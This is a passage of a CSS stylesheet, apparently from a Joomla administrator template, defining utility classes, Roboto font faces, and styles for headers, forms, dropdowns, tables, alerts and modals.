.link-alert-success:hover, .link-alert-success:focus {
  color: #0c261a;
}

.ratio {
  position: relative;
  width: 100%;
}
.ratio::before {
  display: block;
  padding-top: var(--aspect-ratio);
  content: "";
}
.ratio > * {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}

.ratio-1x1 {
  --aspect-ratio: 100%;
}

.ratio-4x3 {
  --aspect-ratio: calc(3 / 4 * 100%);
}

.ratio-16x9 {
  --aspect-ratio: calc(9 / 16 * 100%);
}

.ratio-21x9 {
  --aspect-ratio: calc(9 / 21 * 100%);
}

.fixed-top {
  position: fixed;
  top: 0;
  right: 0;
  left: 0;
  z-index: 1030;
}

.fixed-bottom {
  position: fixed;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1030;
}

.sticky-top {
  position: sticky;
  top: 0;
  z-index: 1020;
}

@media (min-width: 576px) {
  .sticky-sm-top {
    position: sticky;
    top: 0;
    z-index: 1020;
  }
}
@media (min-width: 768px) {
  .sticky-md-top {
    position: sticky;
    top: 0;
    z-index: 1020;
  }
}
@media (min-width: 992px) {
  .sticky-lg-top {
    position: sticky;
    top: 0;
    z-index: 1020;
  }
}
@media (min-width: 1200px) {
  .sticky-xl-top {
    position: sticky;
    top: 0;
    z-index: 1020;
  }
}
@media (min-width: 1400px) {
  .sticky-xxl-top {
    position: sticky;
    top: 0;
    z-index: 1020;
  }
}
.visually-hidden, .sr-only,
.visually-hidden-focusable:not(:focus):not(:focus-within) {
  position: absolute !important;
  width: 1px !important;
  height: 1px !important;
  padding: 0 !important;
  margin: -1px !important;
  overflow: hidden !important;
  clip: rect(0, 0, 0, 0) !important;
  white-space: nowrap !important;
  border: 0 !important;
}

.stretched-link::after {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1;
  content: "";
}

.text-truncate {
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
}

@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff") format("woff");
  font-weight: 400;
  font-style: normal;
}
@font-face {
  font-family: "Roboto-Regular";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff") format("woff");
  font-weight: 400;
  font-style: italic;
}
@font-face {
  font-family: "Roboto-RegularItalic";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff") format("woff");
  font-weight: 300;
  font-style: normal;
}
@font-face {
  font-family: "Roboto-Light";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff") format("woff");
  font-weight: 300;
  font-style: italic;
}
@font-face {
  font-family: "Roboto-LightItalic";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff") format("woff");
  font-weight: 100;
  font-style: normal;
}
@font-face {
  font-family: "Roboto-Thin";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff") format("woff");
  font-weight: 100;
  font-style: italic;
}
@font-face {
  font-family: "Roboto-ThinItalic";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff") format("woff");
  font-weight: 500;
  font-style: normal;
}
@font-face {
  font-family: "Roboto-Medium";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff") format("woff");
  font-weight: 500;
  font-style: italic;
}
@font-face {
  font-family: "Roboto-MediumItalic";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff") format("woff");
  font-weight: 700;
  font-style: normal;
}
@font-face {
  font-family: "Roboto-Bold";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff") format("woff");
  font-weight: 700;
  font-style: italic;
}
@font-face {
  font-family: "Roboto-BoldItalic";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff") format("woff");
  font-weight: 900;
  font-style: normal;
}
@font-face {
  font-family: "Roboto-Black";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff") format("woff");
  font-weight: 900;
  font-style: italic;
}
@font-face {
  font-family: "Roboto-BlackItalic";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff") format("woff");
}
html {
  height: 100%;
}
html.a11y_font {
  font-size: 18px;
}

body {
  display: flex;
  flex-direction: column;
  min-height: 100%;
  padding: 0;
  margin: 0;
  text-align: start;
}
body.admin {
  background-color: var(--template-bg-dark-5);
}
body.monochrome {
  -webkit-filter: grayscale(1);
          filter: grayscale(1);
}
body.monochrome::after {
  position: fixed;
  top: 0;
  left: 0;
  z-index: -1;
  width: 100%;
  height: 100%;
  content: "";
  background: var(--template-bg-dark-5);
}
body.a11y_contrast {
  -webkit-filter: contrast(115%);
          filter: contrast(115%);
}
body.monochrome.a11y_contrast {
  -webkit-filter: grayscale(1) contrast(115%);
          filter: grayscale(1) contrast(115%);
}
body.a11y_highlight a,
body.a11y_highlight .header-item-content {
  padding: 3px;
  text-decoration: underline !important;
  border: #f00 dotted 1px;
}
body.a11y_highlight .joomlaversion {
  padding: 0;
  text-decoration: none !important;
  border: none;
}
body.a11y_highlight a.page-link {
  padding: 0.375rem 0.75rem;
}

h1, .h1,
h2,
.h2,
h3,
.h3,
h4,
.h4,
h5,
.h5,
h6,
.h6 {
  font-weight: 700;
}

h1, .h1 {
  font-weight: 400;
}

small,
.small {
  font-size: 0.8rem;
}

legend {
  font-size: 1.2rem;
  font-weight: 700;
}

.js-focus-visible :focus:not(.focus-visible) {
  outline: none;
}

a.focus-visible,
button.focus-visible,
input.focus-visible,
textarea.focus-visible {
  outline: auto 2px var(--focus);
}

.break-word {
  word-break: break-all;
  word-wrap: break-word;
}

label,
caption {
  font-size: 1rem;
  text-align: start;
}

.logo img path {
  fill: var(--template-text-dark);
}

.container-main,
.system-debug {
  padding-bottom: 50px;
}

body .container-main {
  order: 1;
  position: relative;
  padding-right: 0;
  padding-left: 0;
}

.content {
  padding: 1rem;
}
@media (min-width: 768px) {
  .content {
    padding: 0 2rem;
  }
  .subhead + .content {
    padding-top: 0;
  }
}

body:not(.contentpane) .main-card {
  background: #fff;
  border-radius: 0.25rem;
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}

.row-selected {
  background-color: var(--toolbar-bg);
}

.chzn-container-single {
  width: auto !important;
}

.input-group input {
  min-width: 220px;
}

.item-associations {
  padding: 0;
}

.item-associations li {
  display: inline-block;
  margin-bottom: 3px;
  list-style: none;
}

.message-alert {
  text-align: end !important;
}

a[target=_blank]::before {
  -webkit-padding-end: 3px;
          padding-inline-end: 3px;
  font-family: "Font Awesome 5 Free";
  font-size: 14px;
  font-weight: 900;
  content: "";
}

@media (max-width: 575.98px) {
  #wrapper.d-flex {
    display: block !important;
  }
}

.text-muted {
  color: var(--template-text-dark) !important;
  opacity: 0.7;
}

.card-columns {
  display: grid;
  grid-gap: 0 15px;
  grid-template-columns: 1fr;
}
@media (min-width: 768px) {
  .card-columns {
    grid-template-columns: 1fr 1fr;
  }
}

@media (min-width: 768px) {
  .cpanel-help .card-columns,
.cpanel-system .card-columns {
    grid-template-columns: 1fr 1fr 1fr;
  }
}

.tiny {
  font-size: 0.6rem;
  line-height: 1.4rem;
}

details {
  padding: 0.5rem 1rem;
  margin: 0 0 2rem;
  background: var(--template-bg-dark-3);
  border: 1px solid var(--template-bg-dark-10);
  border-radius: 0.25rem;
}
details summary {
  color: var(--template-link-color);
}
details summary ~ * {
  margin-top: 1rem;
}

meter {
  width: 100%;
}

@media (min-width: 768px) {
  joomla-tab[orientation=horizontal]:not([view=accordion]) section > .row {
    --gutter-x: 4rem;
  }
  joomla-tab[orientation=horizontal]:not([view=accordion]) section > .row > * + * {
    -webkit-border-start: 1px solid var(--template-bg-dark-10);
            border-inline-start: 1px solid var(--template-bg-dark-10);
  }
}
.minicolors-theme-bootstrap .minicolors-swatch {
  width: 36px;
  height: 36px;
}
.minicolors-theme-bootstrap .minicolors-swatch > .minicolors-sprite {
  top: 50%;
  left: 8px;
  border-radius: 0;
  -webkit-transform: translateY(-50%);
          transform: translateY(-50%);
}

span.minicolors-swatch-color {
  cursor: pointer;
}

@media (max-width: 767.98px) {
  .badge {
    white-space: normal;
  }
}
.badge.bg-secondary:hover {
  color: #fff;
}

.btn {
  transition: none;
}

@media (max-width: 575.98px) {
  .btn {
    margin-bottom: 0.25rem;
  }

  .input-group .btn {
    margin-bottom: 0;
  }
}
.btn-primary {
  color: var(--template-text-light);
  background-color: var(--template-bg-dark-60);
  border-color: var(--template-bg-dark-60);
}
.btn-primary:hover, .btn-primary:focus, .btn-primary:active {
  background-color: var(--template-bg-dark-70);
  border-color: var(--template-bg-dark-90);
}
.btn-primary:not(:disabled):not(.disabled):active, .btn-primary:not(:disabled):not(.disabled).active, .show > .btn-primary.dropdown-toggle {
  background-color: var(--template-bg-dark);
  border-color: var(--template-bg-dark);
}

.btn-secondary {
  background-color: var(--template-bg-dark-60);
  border-color: var(--template-bg-dark-60);
}

.input-group-text {
  background-color: var(--template-bg-dark);
  border-color: var(--template-bg-dark);
}

.card-columns .card {
  margin-bottom: 1rem;
}
@media (min-width: 576px) {
  .card-columns {
    -webkit-column-count: 3;
       -moz-column-count: 3;
            column-count: 3;
    -webkit-column-gap: 1.25rem;
       -moz-column-gap: 1.25rem;
            column-gap: 1.25rem;
    orphans: 1;
    widows: 1;
  }
  .card-columns .card {
    display: inline-block;
    width: 100%;
  }
}

.content .card {
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}
.content .card-header {
  display: flex;
  padding: 1rem 1rem 0.75rem;
  font-weight: 700;
  color: var(--template-bg-dark);
  background: var(--card-bg);
}
.content .card-header > [class^=icon-],
.content .card-header > img {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}

.form-select, .custom-select {
  max-width: 100%;
  cursor: pointer;
  background: url("../images/select-bg.svg") no-repeat right center/116rem;
  background-color: var(--template-bg-light);
  border: solid 1px var(--template-bg-dark-20);
}
[dir=rtl] .form-select, [dir=rtl] .custom-select {
  padding: 0.5rem 1rem 0.5rem 4rem;
  background: url("../images/select-bg-rtl.svg") no-repeat left center/116rem;
  background-color: var(--template-bg-light);
}
.form-select[multiple], [multiple].custom-select {
  padding: 0;
  background-color: var(--white-offset);
}
.form-select[multiple] option, [multiple].custom-select option {
  padding: 0.3rem 1rem;
  background-color: var(--white-offset);
}
.form-select[multiple] option:checked, [multiple].custom-select option:checked {
  color: var(--template-text-light);
  background-color: var(--template-bg-dark) !important;
}
.form-select.form-select-success, .form-select-success.custom-select, .form-select.custom-select-success, .custom-select-success.custom-select {
  color: var(--success);
  background-color: var(--success);
  border-color: var(--success);
}
.form-select.form-select-success option, .form-select-success.custom-select option, .form-select.custom-select-success option, .custom-select-success.custom-select option {
  color: var(--template-text-dark);
  background-color: var(--white-offset);
}
.form-select.form-select-danger, .form-select-danger.custom-select, .form-select.custom-select-danger, .custom-select-danger.custom-select {
  color: var(--danger);
  background-color: var(--danger);
  border-color: var(--danger);
}
.form-select.form-select-danger option, .form-select-danger.custom-select option, .form-select.custom-select-danger option, .custom-select-danger.custom-select option {
  color: var(--template-text-dark);
  background-color: var(--white-offset);
}
.form-select:focus, .custom-select:focus {
  border-color: #39f;
  box-shadow: 0 0 0 0.2rem #eaeaea;
}
.form-select:disabled, .custom-select:disabled {
  cursor: default;
  background: #e8e8e8;
  border: 0;
  box-shadow: none;
}
.form-select optgroup, .custom-select optgroup,
.form-select option,
.custom-select option {
  color: var(--template-text-dark);
  background-color: #fff;
}

.accordion .card-header {
  display: block;
  font-size: 0.9286rem;
  font-weight: 700;
  line-height: 1.2;
}
.accordion .list-group-item {
  color: var(--template-link-color);
}

.btn-group .dropdown-menu {
  min-width: 100%;
  background: #fff;
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.15);
}
.btn-group .dropdown-menu joomla-toolbar-button {
  text-align: start;
  border: 0;
}

.dropdown-menu {
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}

.dropdown-item {
  text-align: start;
  border-bottom: 1px solid rgba(0, 0, 0, 0.1);
}
.btn-primary + .dropdown-menu .dropdown-item:hover, .btn-primary + .dropdown-menu .dropdown-item:focus {
  background-color: var(--template-bg-dark);
}
.btn-secondary + .dropdown-menu .dropdown-item:hover, .btn-secondary + .dropdown-menu .dropdown-item:focus {
  color: var(--template-text-light);
  background-color: var(--secondary);
}
.btn-danger + .dropdown-menu .dropdown-item:hover, .btn-danger + .dropdown-menu .dropdown-item:focus {
  background-color: var(--danger);
}
.btn-info + .dropdown-menu .dropdown-item:hover, .btn-info + .dropdown-menu .dropdown-item:focus {
  background-color: var(--info);
}
.dropdown-status-group .dropdown-menu .dropdown-item:hover:not(.disabled), .dropdown-status-group .dropdown-menu .dropdown-item:focus:not(.disabled) {
  color: var(--template-text-light);
  background-color: var(--template-bg-dark);
}
.dropdown-save-group .dropdown-menu .dropdown-item:hover:not(.disabled), .dropdown-save-group .dropdown-menu .dropdown-item:focus:not(.disabled) {
  color: var(--template-text-light);
  background-color: var(--success);
}
.dropdown-item + .dropdown-item {
  border-top: 1px solid rgba(0, 0, 0, 0.1);
}
.dropdown-status-group .dropdown-menu .dropdown-item:not(.disabled) {
  color: var(--action);
}
.dropdown-save-group .dropdown-menu .dropdown-item:not(.disabled) {
  color: var(--success);
}
.dropdown-item.first:not(.last) {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.dropdown-item.last:not(.first) {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.dropdown-item:not(.first):not(.last):not(:only-of-type) {
  border-radius: 0;
}

label {
  margin-bottom: 0;
}

td .form-control {
  display: inline-block;
  width: auto;
}

legend {
  margin-bottom: 1.1rem;
  font-size: 1rem;
  font-weight: 400;
}

.checkboxes {
  padding-top: 5px;
}
.checkboxes .checkbox input {
  position: static;
  margin-left: 0;
}

.form-check {
  padding-top: 5px;
  margin-bottom: 0;
}

.modal label {
  width: 100%;
}

.invalid {
  color: var(--danger);
  border-color: var(--danger);
}

.valid {
  border-color: var(--success);
}

.form-control-feedback {
  display: block;
}

[aria-grabbed=true] {
  box-shadow: 0 0 2px 1px var(--template-bg-dark);
}

select.form-control {
  background-color: var(--template-bg-light);
}

.field-media-wrapper {
  display: block;
  width: 100%;
  max-width: calc(50vw - 5rem);
}
.field-media-wrapper .field-media-preview {
  width: 100%;
  max-width: none;
}
.field-media-wrapper .button-select {
  background-color: #366342;
}
.field-media-wrapper .button-clear {
  background-color: #a32120;
}
.field-media-wrapper .button-clear > .fa-check,
.field-media-wrapper .button-select > .fa-times {
  color: #f8f9fa;
}
@media (max-width: 991.98px) {
  .field-media-wrapper {
    min-width: 100%;
  }
}

.form-inline .form-select, .form-inline .custom-select, .form-inline .form-control {
  display: inline-block;
  width: auto;
}

@media (max-width: 767.98px) {
  .form-inline .form-select, .form-inline .custom-select, .form-inline .form-control {
    width: 100%;
  }
}
.list-group-item {
  background-color: var(--white-offset);
}

.list-unstyled .list-unstyled {
  padding-left: 20px;
}

.jviewport-height10 {
  height: 10vh;
}
.jviewport-height20 {
  height: 20vh;
}
.jviewport-height30 {
  height: 30vh;
}
.jviewport-height40 {
  height: 40vh;
}
.jviewport-height50 {
  height: 50vh;
}
.jviewport-height60 {
  height: 60vh;
}
.jviewport-height70 {
  height: 70vh;
}
.jviewport-height80 {
  height: 80vh;
}
.jviewport-height90 {
  height: 90vh;
}
.jviewport-height100 {
  height: 100vh;
}

[class*=jviewport-height] iframe {
  height: 100%;
}

.modal-dialog.jviewport-width10 {
  width: 10vw;
}
.modal-dialog.jviewport-width20 {
  width: 20vw;
  max-width: none;
}
.modal-dialog.jviewport-width30 {
  width: 30vw;
  max-width: none;
}
.modal-dialog.jviewport-width40 {
  width: 40vw;
  max-width: none;
}
.modal-dialog.jviewport-width50 {
  width: 50vw;
  max-width: none;
}
.modal-dialog.jviewport-width60 {
  width: 60vw;
  max-width: none;
}
.modal-dialog.jviewport-width70 {
  width: 70vw;
  max-width: none;
}
.modal-dialog.jviewport-width80 {
  width: 80vw;
  max-width: none;
}
.modal-dialog.jviewport-width90 {
  width: 90vw;
  max-width: none;
}
.modal-dialog.jviewport-width100 {
  width: 100vw;
  max-width: none;
}

@media (max-width: 767.98px) {
  .modal-dialog {
    margin: 1.75rem auto;
  }
}
.modal-dialog .modal-body {
  padding: 0;
}

.pagination {
  margin: 1rem;
}

th {
  text-align: inherit;
  /* stylelint-disable-next-line */
  text-align: -webkit-match-parent;
}

.table thead th {
  font-size: 1rem;
}
.table thead th,
.table thead td {
  white-space: nowrap;
}
.sysinfo .table thead th,
.sysinfo .table thead td {
  white-space: normal;
}
.table thead a {
  color: var(--template-link-color);
}
.table thead a#sorted {
  font-weight: 500;
  color: #343a40;
}
@media (max-width: 767.98px) {
  .table thead .actions,
.table thead .actions-th1 {
    width: 28%;
  }
}
.table tbody tr:hover, .table tbody tr:focus, .table tbody tr:active {
  background-color: rgba(0, 0, 0, 0.075);
}
.table tbody tr:last-of-type th,
.table tbody tr:last-of-type td {
  border-bottom: 0;
}
.table tbody .itemnumber a.btn,
.table tbody .itemnumber span.btn {
  padding: 0.1rem 0.5rem;
  text-decoration: none;
}
.table tbody th {
  font-weight: 500;
}
.table tbody a:not(.badge) {
  text-decoration: underline;
}
.table th label,
.table td label {
  margin-bottom: 0;
}
.table th .inactive [class^=icon-],
.table th .inactive [class*=" icon-"],
.table th .inactive [class^=fa-],
.table th .inactive [class*=" fa-"],
.table td .inactive [class^=icon-],
.table td .inactive [class*=" icon-"],
.table td .inactive [class^=fa-],
.table td .inactive [class*=" fa-"] {
  color: #cdcdcd;
}
.j-main-container > .table {
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}

.alert {
  margin: 1rem 0;
  border-right: 0;
  border-left: 0;
  border-radius: 0.2rem;
}
.alert.alert-info {
  color: var(--template-bg-dark);
  background-color: var(--template-bg-dark-10);
  border: 1px solid var(--template-bg-dark-20);
}
.alert.alert-warning {
  color: #996900;
  background-color: #fffcf4;
  border: 1px solid #ffb514;
}
.alert.alert-success {
  color: #457d54;
  background-color: #f2f8f4;
  border: 1px solid hsl(var(--hue), 50%, 93%);
}
.alert.alert-error {
  color: #c52827;
  background-color: #fef8f8;
  border: 1px solid #c52827;
}

.alert-parent {
  margin-top: 0;
}

fieldset .alert.alert-info {
  margin: -1rem 0 1rem;
}

.alert-heading {
  font-size: 1rem;
}

@-webkit-keyframes fadeIn {
  from {
    opacity: 0;
    -webkit-transform: translateY(-15px);
            transform: translateY(-15px);
  }
  to {
    opacity: 1;
    -webkit-transform: translateY(0);
            transform: translateY(0);
  }
}

@keyframes fadeIn {
  from {
    opacity: 0;
    -webkit-transform: translateY(-15px);
            transform: translateY(-15px);
  }
  to {
    opacity: 1;
    -webkit-transform: translateY(0);
            transform: translateY(0);
  }
}
.title-alias .form-control {
  max-width: 100%;
}
.title-alias .form-control-feedback {
  position: absolute;
  right: 1rem;
  bottom: -1.8rem;
  text-align: right;
}

.layout-edit .title-alias .form-group {
  box-shadow: none;
}

.header {
  z-index: 1020;
  color: #fff;
  background: var(--template-bg-dark);
}
.header-inside {
  display: flex;
  min-height: 54px;
}
.header a {
  color: #fff;
}
.header a:before {
  display: none;
}
.header .logo {
  display: flex;
  flex-flow: row nowrap;
  align-items: center;
  width: 18rem;
  height: 100%;
  padding: 12px 5px;
  overflow: hidden;
  background-color: var(--template-bg-dark-70);
  transition: all 0.3s ease-in-out;
}
.header .logo.small {
  width: 3rem;
  transition: all 0.3s ease-in-out;
}
.header .logo.small svg:not(.logo-collapsed),
.header .logo.small img:not(.logo-collapsed) {
  display: none;
}
.header .logo.small svg.logo-collapsed,
.header .logo.small img.logo-collapsed {
  display: inline-block;
  width: 20px;
  height: 20px;
  -o-object-fit: contain;
     object-fit: contain;
  -o-object-position: center center;
     object-position: center center;
}
.header .logo svg,
.header .logo img {
  width: 150px;
  height: 30px;
  margin: 0 0.35rem;
  -o-object-fit: contain;
     object-fit: contain;
  -o-object-position: left center;
     object-position: left center;
}
[dir=rtl] .header .logo svg,
[dir=rtl] .header .logo img {
  -o-object-position: right center;
     object-position: right center;
}
.header .logo svg.logo-collapsed,
.header .logo img.logo-collapsed {
  display: none;
}
.header .page-title {
  padding: 0 1rem;
  margin: 0;
  overflow: hidden;
  font-size: 1.2rem;
  color: #fff;
  text-overflow: ellipsis;
  white-space: nowrap;
}
.header .page-title > span {
  -webkit-margin-end: 0.25rem;
          margin-inline-end: 0.25rem;
}
.header .dropdown-menu {
  font-size: 0.85rem;
}
.header .dropdown-header,
.header .dropdown-item {
  padding: 0.82rem 0.75rem;
  color: #fff;
  background-color: var(--template-bg-dark-70);
}
.header .dropdown-header > span,
.header .dropdown-item > span {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}
.header .dropdown-header:hover,
.header .dropdown-item:hover {
  background-color: var(--template-bg-dark);
}
.header .dropdown-header {
  padding: 0.75rem;
  font-size: inherit;
  background-color: var(--template-bg-dark);
}

.header-items {
  align-items: center;
  justify-content: flex-end;
  width: 50%;
  margin: 15px;
  -webkit-margin-start: auto;
          margin-inline-start: auto;
}
.header-items .dropdown-toggle {
  background-color: transparent;
  border: 0;
}
.header-items .dropdown-toggle::after {
  display: none;
}

.header-item {
  position: relative;
  margin: 0 4px;
}

.header-item-content {
  display: flex;
  align-items: center;
  line-height: 1rem;
  color: #fff;
  background-color: var(--template-bg-dark-60);
  border-radius: 22px;
  -webkit-padding-end: 4px;
          padding-inline-end: 4px;
}
.header-item-content a,
.header-item-content button {
  color: #fff;
  text-decoration: none;
}
.header-item-content a {
  display: flex;
}
.header-item-content:not(.no-link):not(.joomlaversion):hover {
  background-color: var(--template-bg-dark-50);
}
.header-item-content.joomlaversion {
  color: var(--bluegray);
  background-color: transparent;
}
.header-item-content.joomlaversion .header-item-text {
  -webkit-padding-end: 12px;
          padding-inline-end: 12px;
}

.header-item-icon > * {
  display: flex;
  align-items: center;
  justify-content: center;
  width: 28px;
  min-width: 28px;
  height: 28px;
  margin: 4px;
  color: #fff;
  background-color: var(--template-bg-dark);
  border-radius: 16px;
}
.header-item-icon span {
  margin: 4px;
}

.header-item-count {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}

.header-item-text {
  padding: 0 8px 0 4px;
  font-size: 0.75rem;
  white-space: nowrap;
}

.header-more-btn {
  margin: 0 5px;
  font-size: 1.7rem;
}

.header-dd-items .header-item-content {
  background: transparent;
}
.header-dd-items .header-item-text {
  font-size: 0.75rem;
}
.header-dd-items .dropdown-item {
  padding: 0.5rem 0.75rem;
}

.header-dd-item {
  padding: 3px 6px;
}

@media (max-width: 767.98px) {
  .header-items {
    position: fixed;
    bottom: 0;
    flex-direction: row-reverse;
    width: 100%;
    padding: 10px 0;
    margin: 0;
    background: var(--template-bg-dark);
  }
  .header-items .icon-angle-down,
.header-items .fa-angle-down {
    -webkit-transform: rotate(180deg);
            transform: rotate(180deg);
  }

  .header-item-more.active .header-more-menu {
    left: 0;
  }
  [dir=rtl] .header-item-more.active .header-more-menu {
    right: 0;
    left: auto;
  }
  .header-item-more .header-item-content {
    background: transparent;
  }

  .header-more-menu {
    top: auto;
    bottom: 100%;
  }
}
.form-control {
  max-width: 100%;
  background-color: #fff;
  border: solid 1px var(--template-bg-dark-20);
  border-radius: 0.25rem;
}
.form-control:focus {
  border-color: #39f;
  box-shadow: 0 0 0 0.2rem #eaeaea;
}

.control-group {
  position: relative;
  display: flex;
  flex-wrap: wrap;
  margin: 0 0 1rem;
}
.control-group > .form-check {
  display: inline-block;
}
.control-group::after {
  display: table;
  clear: both;
  content: "";
}
.control-group .control-label {
  width: 240px;
  padding: 0.3rem 1rem 0.3rem 0;
}
.control-group .controls {
  position: relative;
  flex: 1;
  min-width: 210px;
}
.control-group .controls + div {
  width: 100%;
  margin: 5px 0 10px;
}
.form-vertical .control-group {
  flex-direction: column;
}

.spacer hr {
  width: 380px;
}
.spacer label {
  width: 440px;
}

td .form-control {
  display: inline-block;
  width: auto;
}

.checkboxes {
  padding-top: 5px;
}
.checkboxes .checkbox input {
  position: static;
  margin-left: 0;
}

.form-check {
  padding-top: 5px;
  margin-bottom: 0;
}

.modal label {
  width: 100%;
}

.invalid {
  color: var(--danger);
  border-color: var(--danger);
}

.valid {
  border-color: var(--success);
}

.form-control-feedback {
  display: block;
}

[aria-grabbed=true] {
  box-shadow: inset 0 0 0 0.1rem #e9e9e9;
}

.sortable-handler.inactive {
  opacity: 0.3;
}

[role=tooltip]:not(.show) {
  z-index: 1070;
  display: none;
  padding: 0.5em;
  margin: 0.25em;
  color: #fff;
  text-align: start;
  background: #000;
  border-radius: 0.2rem !important;
}

:focus + [role=tooltip],
:hover + [role=tooltip] {
  position: absolute;
  display: block;
}

[id="filter[search]-desc"] {
  bottom: 100%;
}

.container-popup [id="filter[search]-desc"] {
  top: 100%;
  bottom: auto;
}

.input-group > .form-control[readonly] {
  margin-right: 1px;
}

div.subform-repeatable-group {
  position: relative;
  padding: 32px 32px 16px 28px;
  margin-top: 20px;
  border: solid 1px var(--template-bg-dark-20);
  border-radius: 0.25rem;
}
div.subform-repeatable-group > .btn-toolbar .btn-group {
  position: static;
}
div.subform-repeatable-group > .btn-toolbar .btn {
  position: absolute;
}
div.subform-repeatable-group > .btn-toolbar .btn.group-add {
  right: -1px;
  bottom: -1px;
  border-radius: 0.25rem 0 0.25rem 0;
}
div.subform-repeatable-group > .btn-toolbar .btn.group-remove {
  top: -1px;
  right: -1px;
  border-radius: 0 0.25rem 0 0.25rem;
}
div.subform-repeatable-group > .btn-toolbar .btn.group-move {
  top: 50%;
  right: 100%;
  margin-top: -27px;
  line-height: 52px;
